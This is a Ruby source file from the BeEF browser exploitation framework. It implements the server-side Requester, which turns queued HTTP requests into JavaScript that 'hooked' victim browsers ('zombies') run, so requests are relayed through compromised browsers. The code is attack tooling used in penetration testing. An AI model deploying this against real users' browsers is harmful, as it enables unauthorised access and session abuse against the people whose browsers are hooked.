module BeEF
module Server
module Modules
  
  #
  # Module containing all the functions to run the Requester.
  #
  # That module is dependent on 'Common'. Hence to use it,
  # your code also needs to include that module.
  #
  module Requester
    
    #
    # Runs the Requester
    #
    def requester_run(zombie)
      # we generate all the requests and output them to the hooked browser
      output = []
      BeEF::Models::Http.all(:zombie_id => zombie.id, :has_ran => false).each {|h|
          output << requester_parse_db_request(h)
        }
      
      # we stop here of our output in empty, that means they aren't any requests to send  
      return if output.empty?
      
      # we build the beefjs requester component
      build_missing_beefjs_components 'beef.net.requester'
      
      # we send the command to perform the requests to the hooked browser
      @body << %Q{
        beef.execute(function() {
          beef.net.requester.send(
            #{output.to_json}
          );
        });
      }
    end
    
    #
    # Converts a HTTP DB Object into a BeEF JS command that
    # can be executed by the hooked browser.
    #
    def requester_parse_db_request(http_db_object)
      req = WEBrick::HTTPRequest.new(WEBrick::Config::HTTP)
      params = nil
      
      begin
        s = StringIO.new http_db_object.request
        req.parse(s)
      rescue Exception => e
        # if an exception is caught, we display it in the console but do not
        # stong beef from executing. That is because we do not want to stop 
        # attacking the hooked browser because of a malformed request.
        puts e.message  
        puts e.backtrace
        return
      end
      
      # Handling post requests
      if not req['content-length'].nil? and req.content_length > 0
        params = []
        # if the content length is invalid, webrick crashes. Hence we try to catch any exception
        # here and continue execution.
        begin
          req.query.keys.each{|k| params << "#{k}=#{req.query[k]}"}
          params = params.join '&'
        rescue Exception => e
          puts e.message  
          puts e.backtrace
          return
        end
      end
      
      # creating the request object
      http_request_object = {
        'id' => http_db_object.id,
        'method' => req.request_method,
        'host' => req.host,
        'port' => req.port,
        'params' => params,
        'uri' => req.unparsed_uri,
        'headers' => {}
      }
      
      req.header.keys.each{|key| http_request_object['headers'][key] = req.header[key]}
      
      http_request_object
    end
    
  end
  
end
end
end